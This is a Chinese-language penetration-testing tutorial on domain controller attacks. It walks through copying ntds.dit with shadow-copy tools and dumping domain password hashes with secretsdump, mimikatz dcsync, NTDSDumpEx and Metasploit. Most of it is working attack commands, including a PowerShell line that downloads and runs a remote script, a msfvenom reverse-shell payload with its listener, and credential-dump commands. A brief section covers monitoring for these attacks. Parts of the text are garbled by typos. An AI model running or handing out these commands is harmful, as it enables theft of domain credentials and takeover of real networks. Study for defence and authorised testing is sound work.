域控安全之域渗透

Posted kali_Ma

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了域控安全之域渗透相关的知识,希望对你有一定的参考价值。

在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\\Windwos\\NTDS\\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。

卷影拷贝服务提取NTDS

在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntds\\ntds.ditntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。在一般情况下,系统运维人员会利用卷影拷贝服务(Volume Shadow Copy Service, VSS)实现这些操作。VSS本质上属快照(Snapshot)技术的一种,主要用于备份和恢复(即使目标文件处于锁定状态)。

一:Ntds的提取

1.1:Ntdsutil.exe提取

ntdsutil.exe是一个为活动目录提供管理机制的命令行工具。使用 ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe)成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上、可以在域控制器上直接操作,也可以通过域内机器在域控制器上远程操作。ntdsutil.exe支持的操作系统有 Windows Server 2003、 Windows Server 2008、 Windows Server 2012。

实验一:Ntdsutil提取Ntds.dit

步骤一:**在域控制器的命令行环境中创建一个快照。**该快照包含Windows的所有文件,且在复制文件时不会受到Windows锁定机制的限制。

1 ntdsutil snapshot “activate instance ntds” create quit quit

【一>所有资源获取<一】
1、200份很多已经买不到的绝版电子书
2、30G安全大厂内部的视频资料
3、100份src文档
4、常见安全面试题
5、ctf大赛经典题目解析
6、全套工具包
7、应急响应笔记
8、网络安全学习路线

可以看到,创建了一个GUID为67d45168-4e4a-4b39-bc80-385d9f493dd3的快照。

步骤二:加载创建的快照

1 ntdsutil snapshot “mount c4c25fa3-510b-4ae7-92b9-a29c68c49d0f” quit quit

步骤三:复制快照中的文件

1 copy C:$SNAP_202012281442_VOLUMEC$\\Windows\\NTDS\\ntds.dit C:\\Users\\Public

步骤四:卸载之前加载的快照并删除

1 ntdsutil snapshot “unmount c4c25fa3-510b-4ae7-92b9-a29c68c49d0f” “delete c4c25fa3-510b-4ae7-92b9-a29c68c49d0f” quit quit

步骤五:查询当前快照

1 ntdsutil snapshot “List All” quit quit

1.2:Vssadminn.exe提取

vssadminn是 Windows Server 2008 & Windows 7提供的VSS管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息(只能管理系统 Provider创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序(writers)和提供程序(providers),以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。vssadminn 的操作流程和ntdsutil类似。

实验二:Vssadminn提取Ntds.dit

步骤一:在域控制器中打开命令行环境,输入如下命令,创建一个C盘的卷影拷贝

1 vssadmin create shadow /for=c:

步骤二:在创建的卷影拷贝中将ntds.dit 复制出来

1 copy \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\windows\\NTDS\\ntds.dit c:\\ntds.dit
2 dir c:\\ | findstr “ntds”

步骤三:删除快照

1 vssadmin delete shadows /for=c: /quiet

1.3:Vssown.vbs提取

vssown.vbs脚本的功能和vssadmin类似。vssown.vbs 脚本是由Tim Tomes开发的,可用于创建和删除卷影拷贝,以及启动和停止卷影拷贝服务。可以在命令行环境中执行该脚本。该脚本中的常用命令如下:

1 //启动卷影拷贝服务
2 cscript vssown.vbs /start
3 1/创建一个C盘的卷影拷贝
4 cscript vssown.vbs /create c
5 //列出当前卷影拷贝
6 cscript vssown.vbs /list
7 //删除卷影拷贝
8 cscript vssown.vbs /delete

实验三:Vssown.vbs提取Ntds.dit

步骤一:启动卷影拷贝服务

1 cscript vssown.vbs /start

步骤二:创建一个C盘的卷影拷贝

1 cscript vssown.vbs /create c

步骤三:列出当前卷影拷贝

1  cscript vssown.vbs /list

步骤四:复制ntds.dit

1 copy \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy4\\windows\\NTDS\\ntds.dit c:\\ntds.dit

步骤五:删除卷影拷贝

1 cscript vssown.vbs /delete 9AB33ECE-8FF2-49A8-9305-101993C6648E

1.4:Ntdsutil的IFM

使用创建一个IFM的方式获取NTDS。在使用ntdsutil创建IFM时,需要进行生成快照、加载、将ntds. dit和计算机的SAM文件复制到目标文件夹中等操作。这些操作也可以通过PowerShell或WMI远程执行。

实验四:Ntdsutil创建卷影拷贝

步骤一:在域控制器中以管理员模式打开命令行

1 ntdsutil “ac i ntds” “ifm” “create full c:/test” q q

步骤二:将ntds.dit复制到**c:\\test\\Active Directory\\**文件夹下,将SYSTEM和SECURITY复制到**c:\\test\\registry**文件夹下

1 dir “c:\\test\\Active Directory”
2 dir “c:\\test\\registry”

步骤三:将ntds.dit拖回本地,删除test文件夹

1 rmdir /s /q “C:\\test”

步骤四:nishang中有一个powershell脚本**copy-vss.ps1**通过改脚本可以将:SAM/SYSTEM/Ntds.dit文件复制到与改脚本相同的目录…(github上可下载Copy-VSS.ps1)

1 import-module .\\Copy.VSS.ps1
2 Copy-vss

备注:Powershell语法…

1 IEX (New-Object Net.WebClient).DownloadString(‘http://39.xxx.xxx.210/Nishang/Gather/Copy-VSS.ps1’);Copy-VSS

1.5:DiskShadow

微软官方文档中有这样的说明:“diskshadow.exe 这款工具可以使用卷影拷贝服务(VSS)所提供的多个功能。在默认配置下,diskshadow.exe 使用了一种交互式命令解释器, 与DiskRaid或DiskPart类似。”事实上,因为diskshadow的代码是由微软签名的,而且Windows Server 2008Windows Server 2012Windows Server 2016都默认包含diskshadow,所以,diskshadow 也可以用来操作卷影拷贝服务并导出ntds dit。diskshadow的功能与vshadow类似,且同样位于C:windows\\system32\\目录下。不过,vshdow是包含在Windows SDK中的,在实际应用中可能需要将其上传到目标机器中。

diskhadow 有交互和非交互两种模式。在使用交互模式时,需要登录远程桌面的图形化管理界面。不论是交互模式还是非交互模式,都可以使用exee调取一个脚本 文件来执行相关命令。下面通过实验讲解diskshadow的常见命令及用法。

1 diskshadow.exe /?    #查看diskshadow.exe的帮助信息

实验五:DiskShadow提取Ntds.dit

步骤一:在渗透测试中,可以使用diskshadow.exe来执行命令。例如,将需要执行的命令"exec c:\\windows\\system32\\calc.exe"写入c盘目录下的command.txt文件,使用diskshadow.exe执行该文件中的命令

1 c:>diskshadow /s c:\\commmand.txt

步骤二:使用diskshadow.exe加载command.txt文件时需要在c:\\windows\\system32下执行…

1 c:\\Windows\\System32>diskshadow /s c:\\command.txt

1 //设置卷影拷贝
2 set context persistent nowriters
3 //添加卷
4 add volume c: alias someAlias  
5 //创建快照
6 create  
7 //分配虚拟磁盘盘符
8 expose %someAlias% k:  
9 //将ntds.dit复制到C盘c:\\ntds.dit
10 exec “cmd.exe” /c copy K:\\Windows\\NTDS\\ntds.dit c:\\ntds.dit  
11 //删除所有快照
12 delete shadows all  
13 //列出系统中的卷影拷贝
14 list shadows all  
15 //重置
16 reset  
18 //退出
19 exit

步骤三:导出ntds.dit后,可以将system.hive转储。因为system.hive中存放着ntds.dit的密钥,所以如果没有该密钥,将无法查看ntds.dit中的信息。

1 c:>reg save hklm\\system c:\\windows\\temp\\system.hive

在使用DiskShadow过程中,需要注意以下几点:

  • 渗透测试人员可以在非特权用户权限下使用diskshadow.exe 的部分功能。与其他工具相比,diskshadow 的使用更为灵活。

  • 在使用diskshadow.exe 执行命令时,需要将文本文件上传到目标操作系统的本地磁盘中,或者通过交互模式完成操作。而在使用vshadow等工具时,可以直接执行相关命令。

  • 在渗透测试中,应该先将含有需要执行的命令的文本文件写人远程目标操作系统,再使用diskshadow.exe调用该文本文件。

  • 在使用diskshadow.exe导出ntds.dit时,可以通过WMI对远程主机进行操作。

  • 在使用diskshadow.exe导出ntds.dit时,必须在C:\\windows\\system32\\中进行操作。

  • 脚本执行后,要检查从快照中复制出来的ntds.dit文件的大小。如果文件大小发生了改变,可以检查或修改脚本后重新执行。

1.6:监控卷影拷贝

通过监控卷影拷贝服务的使用情况可以及时发现攻击者在系统中进行的一些恶意操作…

  • 监控卷影拷贝服务及任何涉及活动目录数据库文件(ntds.dit)的可疑操作行为。

  • 监控System Event ID 7036(卷影拷贝服务进人运行状态的标志)的可疑实例,以及创建vssvc.exe进程的事件。

  • 监控创建dkshndko.exe及相关子进程的事件。

  • 监控客户端设备中的diskshadow.exe实例创建事件。除非业务需要, 在Windows操作系统中不应该出现diskshadow.exe.如果发现,应立刻将其删除。

  • 通过日志监控新出现的逻辑驱动器映射事件。

二:Ntds散列值

当我们获得了域控上的NTDS.dit文件后,我们肯定要想办法从中到处其中的散列值…

2.1:EseDBexport

从NTDS.dit中导出用户表的第一步就是使用libesedb中的esedbexport,你可以下载到最新版本。

步骤一:安装依赖

1 apt-get install autoconf automake autopoint libtool pkg-config

步骤二:进行安装

1 $ ./configure
2 $ make
3 $ sudo make install
4 $ sudo ldconfig

步骤三:到/usr/local/bin/下查看esedbexport工具

步骤四:使用该工具提取ntds.dit中的表并将结果存放在ntds.dit.export中。

两个重要的表为:datatable以及link_table,他们都会被存放在./ntds.dit.export/文件夹中.

一旦表被提取出来,很多python工具可以将这些表中的信息进一步提取,比如ntdsxtract就可以完美进行。

步骤五:安装ntdsxtract

1 $ git clone https://github.com/csababarta/ntdsxtract.git
2 $ cd ntdsxtract/
3 $ python setup.py build && python setup.py install

步骤六:将ntds.dit.export文件夹和system放在同一目录下,执行如下命令:

1 dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 output --syshive system --passwordhashes --pwdformat ocl --ntoutfile ntout --lmoutfile lmout | tee all_user.txt

使用以下命令导出域内计算机信息及其他信息,将会导出为all_computers.csv文件。

1 dscomputers.py ntds.dit.export/datatable.3 computer_output --csvoutfile all_computers.csv

2.2:Impacket

使用Impacket工具包中的Secretsdump也可以解析Ntds.dit文件从而导出散列值.

实验二:Impacket导出散列值

方法一:在Kali Linux执行以下操作

1 git clone https://github.com/csababarta/ntdsxtract.git
2 ┌──(root kali)-[/tools/ntdsxtract]
3 └─# python setup.py install
4 ┌──(root kali)-[/tools/ntdsxtract]
5 └─# impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL    #导出ntds.dit中的散列值。

方法二:impacket还可以通过用户名和散列值进行验证,从远程域控制器中读取ntds.dit并转储域散列值。

1 impacket-secretsdump -hashes <hashdump值> -just-dc testlab.com/Administrator@1.1.1.8

2.3:NTDSDumpex

使用NTDSDumpex.exe可以进行导出散列值的操作。NTDSDumpex将ntds.dit、SYSTEM和NTDSDumpex.exe放在同一目录下,打开命令行环境,输人如下命令,导出域账号和域散列值…

1 C:\\Users\\Administrator\\Desktop>NTDSDumpEx.exe -d ntds.dit -s system

三:散列值获取

以下为其他方式获取NTDS.dit的散列值…

3.1:Mimikatz

mimikaz有一个 dcsync功能,可以利用卷影拷贝服务直接读取ntds.dit文件并检索域散列值。需要注意的是,必须使用域管理员权限运行mimikatz才可以读取ntds.dit

实验一:Mimikatz抓取域散列值

方法一:在域内的任意一台计算机,以管理员权限打开命令行环境

1 lsadump::dcsync /domain:hello.testlab.com /all /csv    #导出域内所有用户名及散列值
2 lsadump::dcsync /domain:hello.testlab.com /user:Administrator    #导出用户Administrator的散列值。

3 privilege::debug
4 lsadump::lsa /inject    #转储lsass.exe进程对散列值进行Dump操作
5 如果没有预先执行prvile::debug命令,将导致权限不足、读取失败。如果用户数量太多,mimikatz 无法完全将其显示出来,可以先执行log命令(会在mimikatz目录下生成一个文本文件,用于记录mimikaz的所有执行结果)。

方法二:Invoke _DCSync.ps1可以利用desync直接读取ntds.dit,以获取域账号和域散列值,输人"Invoke-DCSync -PWDumpFormat"命令(-PWDumpFormat参数用于对输出的内容进行格式化)

1 PS C:\\Users\\Administrator> Import-Module .\\Invoke-DCSync.ps1
2 PS C:\\Users\\Administrator> Invoke-DCSync -PWDumpFormat

3.2:Metasploit

在获取目标主机后通过Ngrok内网穿透获取shell在通过以下操作…获取到域散列值…

实验二:Metasploit获取域散列值

方法一:Psexec_ntdsgrab模块

1 msf6 auxiliary(admin/smb/psexec_ntdsgrab) > back
2 msf6 > use auxiliary/admin/smb/psexec_ntdsgrab
3 msf6 auxiliary(admin/smb/psexec_ntdsgrab) > show options

4 Module options (auxiliary/admin/smb/psexec_ntdsgrab):

5   Name                  Current Setting  Required  Description
----                  ---------------  --------  -----------
6   CREATE_NEW_VSC        false            no        If true, attempts to create a volume shadow copy
7   RHOSTS                1.1.1.8          yes       The target host(s), range CIDR identifier, or hosts file with syntax ‘file:
8  RPORT                 445              yes       The SMB service port (TCP)
9   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
10   SERVICE_DISP.LAY_NAME                   no        The service disp.lay name
11  SERVICE_NAME                           no        The service name
12  SMBDomain             hello.testlab    no        The Windows domain to use for authentication
13  SMBPass               123456Aa         no        The password for the specified username
14  SMBSHARE              C$               yes       The name of a writeable share on the server
15  SMBUser               Administrator    no        The username to authenticate as
16  VSCPATH                                no        The path to the target Volume Shadow Copy
17  WINPATH               WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

18 msf6 auxiliary(admin/smb/psexec_ntdsgrab) > run

19 获取到ntds.dit文件和system复制到/root/.msf6/loot文件夹下,使用impacket工具包进行解析ntds.dit文件。

模块二:基于Meterpreter会话获取域账户与域名散列值…

1 msf6 > use exploit/multi/handler     #创建监听
2 [*] Using configured payload generic/shell_reverse_tcp
3 msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
4 payload => windows/x64/meterpreter/reverse_tcp
5 msf6 exploit(multi/handler) > set lhost 1.1.1.5
6 lhost => 1.1.1.5
7 msf6 exploit(multi/handler) > set lport 777
8 lport => 777

9 ┌──(root kali)-[/var/www/html]
10└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.5 LPORT=777 -f exe > ser.exe    #生成的文件上传到目标机器并执行

11 msf6 exploit(multi/handler) > exploit -j -z
12 [] Exploit running as background job 0.
13 [
] Exploit completed, but no session was created.
14 [*] Started reverse TCP handler on 1.1.1.5:777

15 msf6 exploit(multi/handler) > use post/windows/gather/credentials/domain_hashdump     #使用后渗透模块获取账户和域散列值。
16 msf6 post(windows/gather/credentials/domain_hashdump) > show options
17 msf6 post(windows/gather/credentials/domain_hashdump) > set SESSION 2
18 SESSION => 2
19 msf6 post(windows/gather/credentials/domain_hashdump) > exploit

3.3:Vshadow与QuarksPwDump

在正常的域环境中,ntds.dit文件里包含大量的信息,体积较大,不方便保存到本地。如果域控制器上没有安装杀毒软件,攻击者就能直接进人域控制器,导出ntds.dit并获得域账号和域散列值,而不需要将ntds.dit保存到本地。

QuarksPwDump可以快速、安全、全面地读取全部域账号和域散列值。

ShadowCopy是一款免费的增强 型文件复制工具。ShadowCopy 使用微软的卷影拷贝技术,能够复制被锁定的文件及被其他程序打开的文件。

vshdow.exe是从Windows SDK中提取出来的。在本实验中,安装vshadow.exe 后,会在VSSDK72\\TestApps\\vshadow目录下生成一个bin文件vshadow.xce (可以将该文件单独提取出来使用)将文件全部放人domainhash文件夹中

在shadowcopy.bat中设置工作目录为C:Windows\\Temp(目录可以在shadowcopy.bat中自行设置)

执行shaowopba脚本(该脚本使用vshadow.exe生成快照),复制ntds.dit.然后,使用QuarksPwDump修复ntds.dit并导出域散列值。运行该脚本后,会在刚刚设置的工作目录下存放导出的ntds.dit和hash.txt(包含域内所有的域账号及其散列值)。

四:域提权漏洞

4.1:MS14-068

微软在2014年1月18日发布了一个紧急补了,修复了Kerhers 城用户提权漏润(MS14-068 CVE201462424)所有Windwos服务器操作系统都会受该漏洞的影响,包括WindowsServer2003Windows Server 2008``Windows Sever 2008 R2Windows Server 2012Wins2012R2。该漏洞可导致活动目录整体权限控制受到影响,允许攻击者将城内任意用户权限提升至域管理级别。通俗地讲,如果攻击者获取了城内任何台计算机的Shell 权限,同时知道任意城用的用户名、SID、密码,即可获得城管理员权限,进而控制域控制器,最终获得域权限。

以上是关于域控安全之域渗透的主要内容,如果未能解决你的问题,请参考以下文章

内网渗透横向攻击流程

渗透测试自学系列——什么是IP安全 IPsec

渗透测试自学系列——邮件协议是如何被安全人员利用的?

如何通过代码审计从三层内网各种漏洞拿到域控?

[渗透测试]一次简单的weblogic靶场渗透到拿下域控

内网渗透-完整的域渗透